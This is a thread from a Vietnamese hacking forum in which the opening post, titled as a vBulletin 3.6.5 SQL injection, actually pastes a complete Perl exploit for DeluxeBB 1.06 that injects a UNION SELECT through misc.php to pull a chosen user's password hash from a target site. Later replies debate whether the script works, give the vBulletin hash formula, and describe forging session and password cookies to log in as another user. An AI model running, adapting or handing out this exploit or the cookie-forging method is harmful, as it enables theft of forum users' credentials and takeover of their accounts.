English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Vbulletin 3.6.5 Sql Injection ! [misc.php]  XML
  [Announcement]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 12/05/2007 10:20:10 (+0700) | #1 | 58599
hijackvn
Member
[Minus]    0    [Plus]
Joined: 11/05/2007 22:58:39
Messages: 2
Offline
[Profile] [PM]
Có bác nào biết cách sử dụng pws hash không ?

Code:
#!/usr/bin/perl

use IO::Socket;


print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# 	exploit discovered and coded        #
#	   by KingOfSka                     #
#	http://contropotere.netsons.org	    #
#############################################
};

if (!$ARGV[2]) {

print q{
 	Usage: perl dbbxpl.pl host /directory/ victim_userid

        perl dbbxpl.pl www.somesite.com /forum/ 1


};

exit();

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

  if ($answer =~/(\w{32})/)
{

   if ($1 ne 0) {
    print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

       }
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 12/05/2007 16:50:06 (+0700) | #2 | 58653
[Avatar]
 SonNguyen_sn
Member
[Minus]    0    [Plus]
Joined: 16/04/2007 20:10:44
Messages: 53
Offline
[Profile] [PM]
Lỗi này có cách đây > 1 tháng rồi.
Và hầu hết đã FIXX rồi!
[Up] [Print Copy]
  [Question]   Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] 13/05/2007 11:27:01 (+0700) | #3 | 58819
[Avatar]
 mechk
Member
[Minus]    0    [Plus]
Joined: 26/01/2007 18:07:00
Messages: 49
Location: đâu
Offline
[Profile] [PM] [Yahoo!]
Lấy pass hash rồi làm gì đây bác?
sắp !
[Up] [Print Copy]
  [Question]   Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] 15/05/2007 14:38:30 (+0700) | #4 | 59274
[Avatar]
 SuperChicken
Elite Member
[Minus]    0    [Plus]
Joined: 11/07/2006 18:31:27
Messages: 635
Location: bottom of hell
Offline
[Profile] [PM]
Hix, hôm nọ thử cái script này trên vbb 3.6.5 của mình (mình nhớ là chưa patch gì hết) thì nó cũng hiện hashed password đàng hoàng, hóa ra lại không phải password của mình, search thử giá trị đó trong DB thì rốt cuộc chỉ là 1 cái sessionid vừa được tạo, hìhì, may ghê :lolsmilie
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 19/05/2007 07:25:24 (+0700) | #5 | 60160
[Avatar]
 nhimthulinh
Member
[Minus]    0    [Plus]
Joined: 14/04/2007 16:23:16
Messages: 19
Offline
[Profile] [PM]
Nói vậy nghĩa là ko hiệu wả ah?
[Up] [Print Copy]
  [Question]   Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] 19/05/2007 08:06:56 (+0700) | #6 | 60165
moon_knightvt
Member
[Minus]    0    [Plus]
Joined: 16/02/2007 14:38:19
Messages: 57
Offline
[Profile] [PM]

Siêu trộm wrote:
Hix, hôm nọ thử cái script này trên vbb 3.6.5 của mình (mình nhớ là chưa patch gì hết) thì nó cũng hiện hashed password đàng hoàng, hóa ra lại không phải password của mình, search thử giá trị đó trong DB thì rốt cuộc chỉ là 1 cái sessionid vừa được tạo, hìhì, may ghê :lolsmilie  

bạn ơi cho mình hỏi khi có đoạn code trên thì ta sử dụng như thế nào mình chưa hiểu rõ lắm bạn có thể mail cho mình học pm cho mình theo níck chat sau nhe moon_knight2006 và email: moon_knight2006@yahoo.com
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 19/05/2007 11:04:02 (+0700) | #7 | 60195
[Avatar]
 minhquan1712
Member
[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
hix. Pass hash của VBB được mã hóa 2 lần. Dịch bằng password pro nó ghi là >10000 day mới dịch xong. Từ bỏ ý định đó đi ^^
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 18/06/2007 02:04:40 (+0700) | #8 | 65302
YTQ
Member
[Minus]    0    [Plus]
Joined: 21/03/2007 14:31:19
Messages: 3
Location: Tuyên Quang
Offline
[Profile] [PM] [Yahoo!]
Hệ thống của thằng VBB ngày càng hoàn thiện ! nên càng ngày càng khó chơi ! nên tốt nhất bỏ ý định đi smilie
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 21/06/2007 23:32:55 (+0700) | #9 | 66044
lequi
Member
[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]
Không biết bản mới nhất 3.6.7 có lỗi nào hok nhỉ ??? Chán nhất là thằng VBB bắt phải có license. NULL thì quá chậm để làm 1 forum :L
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 26/06/2007 04:24:46 (+0700) | #10 | 66941
[Avatar]
 minhquan1712
Member
[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
bản null thì đâu có sao đâu bạn. Trên mạng giờ share cả đống bản VBB đã hack. Xài thoải mái. Giờ muốn hack vbb bản 3.6x trở lên hầu như rất khó, chỉ trừ khi admin bất cẩn thôi^^
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 20/07/2007 11:42:30 (+0700) | #11 | 72486
[Avatar]
 phstiger
Member
[Minus]    0    [Plus]
Joined: 23/01/2007 17:47:26
Messages: 261
Offline
[Profile] [PM]
Cụ thể Passhash của VBB là: md5(md5($pass).$salt)
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 02/09/2007 22:58:15 (+0700) | #12 | 82874
kimsonha
Member
[Minus]    0    [Plus]
Joined: 28/05/2007 10:07:19
Messages: 46
Offline
[Profile] [PM] [Yahoo!]
Đúng là nên từ bỏ ý định đi, mấy cái pass hash đó chỉ làm đau đầu mà thôi!
[Up] [Print Copy]
  [Question]   Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] 06/09/2007 00:12:51 (+0700) | #13 | 83480
hijackvn
Member
[Minus]    0    [Plus]
Joined: 11/05/2007 22:58:39
Messages: 2
Offline
[Profile] [PM]
theo mình nghĩ nếu chỉ pwd hash userid thì không có tác dụng. Trong trường hợp này ta phải kết hợp lấy thêm 1 biến nữa là bbsessionhash. Sửa các giá trị cookie (trong firefox) của bbpassword, bbuserid bbssessionhash thì ta sẽ đăng nhập được vào forum với userid đó. mình suy luận dựa vào cách sử dụng cookie lấy được qua xss nhưng chưa thử (không rõ có lấy được sessionhash không). Để khi nào rảnh sẽ test trên localhost
[Up] [Print Copy]
  [Question]   Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] 06/09/2007 00:40:06 (+0700) | #14 | 83485
[Avatar]
 gamma95
Researcher
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]

Siêu trộm wrote:
Hix, hôm nọ thử cái script này trên vbb 3.6.5 của mình (mình nhớ là chưa patch gì hết) thì nó cũng hiện hashed password đàng hoàng, hóa ra lại không phải password của mình, search thử giá trị đó trong DB thì rốt cuộc chỉ là 1 cái sessionid vừa được tạo, hìhì, may ghê :lolsmilie  

tại sao đoạn code đó chỉ lấy đc cái sessionid nhỉ ? muốn nó show ra passhash thực sự thì phải sửa đoạn code này làm sao ?
while ($answer = <$socket>smilie
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n"; 

???
ps: điều kiện khai thác thành công thì magic_quote=off nha các đồng chí
smilie
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Vbulletin 3.6.5 Sql Injection ! [misc.php] 06/09/2007 07:18:56 (+0700) | #15 | 83573
[Avatar]
 KINYO
Member
[Minus]    0    [Plus]
Joined: 30/06/2006 19:10:11
Messages: 272
Location: localhost
Offline
[Profile] [PM] [WWW]

phstiger wrote:
Cụ thể Passhash của VBB là: md5(md5($pass).$salt) 


Giống của IPB nhỉ smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|